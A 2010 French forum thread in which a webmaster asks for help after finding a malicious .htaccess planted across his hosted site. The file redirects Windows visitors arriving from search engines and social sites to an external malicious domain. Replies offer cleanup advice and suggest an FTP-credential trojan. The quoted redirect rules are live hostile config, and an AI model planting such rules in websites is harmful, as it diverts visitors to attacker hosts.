Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1541 connectés 

  FORUM HardWare.fr
  Programmation
  PHP

  Piratage - Page perso Free - .htaccess

 



 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Piratage - Page perso Free - .htaccess

n°1995201
Cocodu670
Posté le 21-05-2010 à 19:43:44  profilanswer
 

Bonjour,
 
je tiens un site web hébergé par Free sur les pages perso.
Depuis une semaine je pense m'être fait "hacké" deux fois. Je vous explique la situation :
 
Je retrouve dans presque tous mes dossier un .htaccess qui contient le code suivant :  
 

Code :
  1. #
  2. # DO NOT EDIT THIS FILE
  3. ErrorDocument 500 http://dns.thesoulfoodcafe.com/mai [...] ZHyJEZ&e=0
  4. ErrorDocument 502 http://dns.thesoulfoodcafe.com/mai [...] ZHyJEZ&e=2
  5. ErrorDocument 403 http://dns.thesoulfoodcafe.com/mai [...] ZHyJEZ&e=3
  6. RewriteEngine On
  7. RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
  8. RewriteCond %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
  9. RewriteCond %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
  10. RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
  11. RewriteCond %{HTTP_REFERER} .*tube.*$ [NC,OR]
  12. RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
  13. RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
  14. RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
  15. RewriteCond %{HTTP_REFERER} .*qq\.com.*$ [NC,OR]
  16. RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
  17. RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
  18. RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
  19. RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
  20. RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
  21. RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
  22. RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
  23. RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
  24. RewriteCond %{HTTP_REFERER} .*amazon.*$ [NC,OR]
  25. RewriteCond %{HTTP_REFERER} .*ebay.*$ [NC,OR]
  26. RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
  27. RewriteCond %{HTTP_REFERER} .*flickr.*$ [NC,OR]
  28. RewriteCond %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
  29. RewriteCond %{HTTP_REFERER} .*soso.*$ [NC,OR]
  30. RewriteCond %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
  31. RewriteCond %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
  32. RewriteCond %{HTTP_REFERER} .*orkut.*$ [NC,OR]
  33. RewriteCond %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
  34. RewriteCond %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
  35. RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
  36. RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
  37. RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
  38. RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
  39. RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
  40. RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
  41. RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
  42. RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
  43. RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
  44. RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
  45. RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
  46. RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
  47. RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
  48. RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
  49. RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
  50. RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC]
  51. RewriteCond %{HTTP_USER_AGENT} .*Windows.*
  52. RewriteRule .* http://dns.thesoulfoodcafe.com/mai [...] j9U8ZHyJEZ [R,L]
  53. RewriteCond %{REQUEST_FILENAME} !-f
  54. RewriteCond %{REQUEST_FILENAME} !-d
  55. RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
  56. RewriteCond %{HTTP_USER_AGENT} .*Windows.*
  57. RewriteRule .* http://dns.thesoulfoodcafe.com/mai [...] j9U8ZHyJEZ [R,L]

 
 
 
Un espace important est laissé entre le texte "DO NOT EDIT THIS FILE" et le code qui suit. Ce code est donc clairement mailveillant.
 
Alors deux questions :  
- que fait ce programme à part désactiver l'accès de mon site aux visiteurs ?
- d'où viens la faille ? En effet, j'enregistre sur base de données toutes les pages qui sont chargée et je ne constate aucune activité suspecte.
 
Note : l'accès de mon site est normalement protégé par mot de passe (.htaccess). Je dois donc le refaire à chaque fois puisqu'il est écrasé.
 
 
Voilà, si vous avez des idées et des suggestions je suis à votre écoute. Merci de m'aider.
 
Merci,
Corentin

mood
Publicité
Posté le 21-05-2010 à 19:43:44  profilanswer
 

n°1995209
gatsu35
Blablaté par Harko
Posté le 21-05-2010 à 20:10:50  profilanswer
 

tu voudrais pas télécharger hijackthis et poster le log obtenu.  
Je suis pret à parier que ton propre pc est un nid à virus


---------------
Blablaté par Harko
n°1995211
Cocodu670
Posté le 21-05-2010 à 20:15:53  profilanswer
 

Merci,
 
C'est bien possible que j'ai des virus sur mon poste... Voici le log d'hijackthis :
 

Code :
  1. Logfile of Trend Micro HijackThis v2.0.2
  2. Scan saved at 20:14:59, on 21/05/2010
  3. Platform: Windows XP SP2 (WinNT 5.01.2600)
  4. MSIE: Internet Explorer v8.00 (8.00.6001.18702)
  5. Boot mode: Normal
  6. Running processes:
  7. C:\WINDOWS\System32\smss.exe
  8. C:\WINDOWS\system32\winlogon.exe
  9. C:\WINDOWS\system32\services.exe
  10. C:\WINDOWS\system32\lsass.exe
  11. C:\WINDOWS\system32\svchost.exe
  12. C:\WINDOWS\System32\svchost.exe
  13. C:\WINDOWS\system32\spoolsv.exe
  14. C:\WINDOWS\Explorer.EXE
  15. C:\WINDOWS\RTHDCPL.EXE
  16. C:\WINDOWS\system32\igfxtray.exe
  17. C:\WINDOWS\system32\hkcmd.exe
  18. C:\WINDOWS\system32\igfxpers.exe
  19. C:\WINDOWS\system32\rundll32.exe
  20. C:\WINDOWS\system32\igfxsrvc.exe
  21. C:\Program Files\Fichiers communs\Java\Java Update\jusched.exe
  22. C:\WINDOWS\system32\ctfmon.exe
  23. C:\Program Files\SpeedswitchXP\SpeedswitchXP.exe
  24. C:\Program Files\McAfee Security Scan\2.0.181\SSScheduler.exe
  25. C:\Program Files\Datacolor\Spyder3Pro\Utility\Spyder3Utility.exe
  26. C:\Program Files\teraterm\Collector\Collector.exe
  27. C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
  28. C:\Program Files\teraterm\ttpmenu.exe
  29. C:\Program Files\Mozilla Firefox\firefox.exe
  30. C:\DOCUME~1\ADMINI~1.ORD\LOCALS~1\Temp\RtkBtMnt.exe
  31. C:\WINDOWS\System32\svchost.exe
  32. C:\Program Files\ptc\flexlm\i486_nt\obj\lmgrd.exe
  33. C:\Program Files\ptc\flexlm\i486_nt\obj\lmgrd.exe
  34. C:\Program Files\Java\jre6\bin\jqs.exe
  35. C:\Program Files\ptc\flexlm\i486_nt\obj\ptc_d.exe
  36. C:\MSC.Software\MSC.Patran\2004\p3manager_files\bin\WINNT\QueMgr.exe
  37. C:\MSC.Software\MSC.Patran\2004\p3manager_files\bin\WINNT\RmtMgr.exe
  38. C:\WINDOWS\system32\HPZipm12.exe
  39. C:\WINDOWS\system32\svchost.exe
  40. C:\Program Files\Notepad++\notepad++.exe
  41. C:\Documents and Settings\Administrateur.ORDI-XPSP2\Mes documents\Téléchargements\HiJackThis.exe
  42. R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
  43. R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.fr
  44. R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
  45. R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
  46. R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
  47. R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
  48. R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
  49. R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://go.microsoft.com/fwlink/?LinkID=82825
  50. R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
  51. R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Favoris
  52. O1 - Hosts: ::1 localhost
  53. O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
  54. O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
  55. O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
  56. O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
  57. O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
  58. O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
  59. O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
  60. O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
  61. O4 - HKLM\..\Run: [AdobeCS4ServiceManager] "C:\Program Files\Fichiers communs\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
  62. O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
  63. O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files\Fichiers communs\Adobe\ARM\1.0\AdobeARM.exe"
  64. O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
  65. O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
  66. O4 - HKLM\..\Run: [Persistence] C:\WINDOWS\system32\igfxpers.exe
  67. O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
  68. O4 - HKLM\..\Run: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
  69. O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Fichiers communs\Java\Java Update\jusched.exe"
  70. O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
  71. O4 - HKCU\..\Run: [SpeedswitchXP] C:\Program Files\SpeedswitchXP\SpeedswitchXP.exe
  72. O4 - Startup: Collector.lnk = C:\Program Files\teraterm\Collector\Collector.exe
  73. O4 - Startup: LimeWire On Startup.lnk = C:\Program Files\LimeWire\LimeWire.exe
  74. O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
  75. O4 - Startup: TeraTerm Menu.lnk = C:\Program Files\teraterm\ttpmenu.exe
  76. O4 - Global Startup: McAfee Security Scan Plus.lnk = ?
  77. O4 - Global Startup: Spyder3Utility.lnk = C:\Program Files\Datacolor\Spyder3Pro\Utility\Spyder3Utility.exe
  78. O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office12\EXCEL.EXE/3000
  79. O9 - Extra button: Envoyer à OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
  80. O9 - Extra 'Tools' menuitem: &Envoyer à OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~3\Office12\ONBttnIE.dll
  81. O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
  82. O23 - Service: dopewars server (dopewars-server) - Unknown owner - C:\Program Files\dopewars-1.5.12\dopewars.exe
  83. O23 - Service: FLEXlm server for PTC - Macrovision Corporation - C:\Program Files\ptc\flexlm\i486_nt\obj\lmgrd.exe
  84. O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Fichiers communs\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
  85. O23 - Service: Service Google Update (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
  86. O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Fichiers communs\InstallShield\Driver\11\Intel 32\IDriverT.exe
  87. O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
  88. O23 - Service: Ma-Config Service (maconfservice) - CybelSoft - C:\Program Files\ma-config.com\maconfservice.exe
  89. O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\2.0.181\McCHSvc.exe
  90. O23 - Service: MSCQueMgr - Unknown owner - C:\MSC.Software\MSC.Patran\2004\p3manager_files\bin\WINNT\QueMgr.exe
  91. O23 - Service: MSCRmtMgr - Unknown owner - C:\MSC.Software\MSC.Patran\2004\p3manager_files\bin\WINNT\RmtMgr.exe
  92. O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
  93. O23 - Service: wampapache - Apache Software Foundation - c:\wamp\bin\apache\apache2.2.11\bin\httpd.exe
  94. O23 - Service: wampmysqld - Unknown owner - c:\wamp\bin\mysql\mysql5.1.36\bin\mysqld.exe
  95. --
  96. End of file - 7271 bytes

n°1995214
gatsu35
Blablaté par Harko
Posté le 21-05-2010 à 20:30:18  profilanswer
 

faut virer ce services :  
O23 - Service: dopewars server (dopewars-server) - Unknown owner - C:\Program Files\dopewars-1.5.12\dopewars.exe


---------------
Blablaté par Harko
n°1995215
gatsu35
Blablaté par Harko
Posté le 21-05-2010 à 20:31:38  profilanswer
 

ya quoi comme site sur ton ftp ?  
tu utilises quoi pour ton site ? nukedclan ?


---------------
Blablaté par Harko
n°1995218
Cocodu670
Posté le 21-05-2010 à 20:39:05  profilanswer
 

Merci de votre aide.
 
Dopewars est un tout petit jeu du style DrugWars (que vous devez connaitre si vous jouiez avec votre calculatrice au lycée). Mais je vais le virer.
 
 
Je me suis renseigné sur un forum de OVH (hébergeur) : il semble que ce type d'attaque soit dû à un trojan sur l'ordinateur du webmaster qui choppe les mots de passe FTP. Je vais donc changer le mot de passe de mon FTP (à partir d'un poste sûr de mon école) et je ferai désormais les mises à jour depuis mon école.
 
Merci encore de votre aide et si vous avez des infos je suis toujours preneur.
 
PS :
ya quoi comme site sur ton ftp ?  
tu utilises quoi pour ton site ? nukedclan ?
 
==> Je ne comprend pas ce que tu veux dire. J'utilise juste un site que j'ai moi-même tapé en php, donc je suppose qu'il peut y avoir des failles de type injection et include bien j'ai fait très attention.
 
Corentin

n°1995221
gatsu35
Blablaté par Harko
Posté le 21-05-2010 à 20:55:08  profilanswer
 

tu voudrais pas passer un coup de adaware et spybot ?  
tu les trouveras sur ninite.com
 
ca fera déjà un peu de nettoyage. Mais sinon reinstalle ta machine s'il faut en arriver là


---------------
Blablaté par Harko
n°1995224
Cocodu670
Posté le 21-05-2010 à 21:09:04  profilanswer
 

gatsu35 a écrit :

tu voudrais pas passer un coup de adaware et spybot ?  
tu les trouveras sur ninite.com
 
ca fera déjà un peu de nettoyage. Mais sinon reinstalle ta machine s'il faut en arriver là


 
 
Merci, je peux pas refaire ma machine en ce moment mais je vais installer adaware et spybot. A bientot !
 
 
Corentin


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Programmation
  PHP

  Piratage - Page perso Free - .htaccess

 

Sujets relatifs
[Résolu] Changer couleur du lien de la page activereponse optenue sujet terminer
Formulaire PHP, retour sur ma page d'origine[résolu] modification du contenu d'une page en fonction d'un paramètre
"Capturer" des données dynamiques d'une page web ?VB : Insérer le contenu d'un textbox dans une page web
[iText] numero de pageRécupérer lien de page html avec php
[API google Maps javascript] affichage page html dans une infobulleintegrer mumble viewer sur sa page .xml
Plus de sujets relatifs à : Piratage - Page perso Free - .htaccess


Copyright © 1997-2018 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR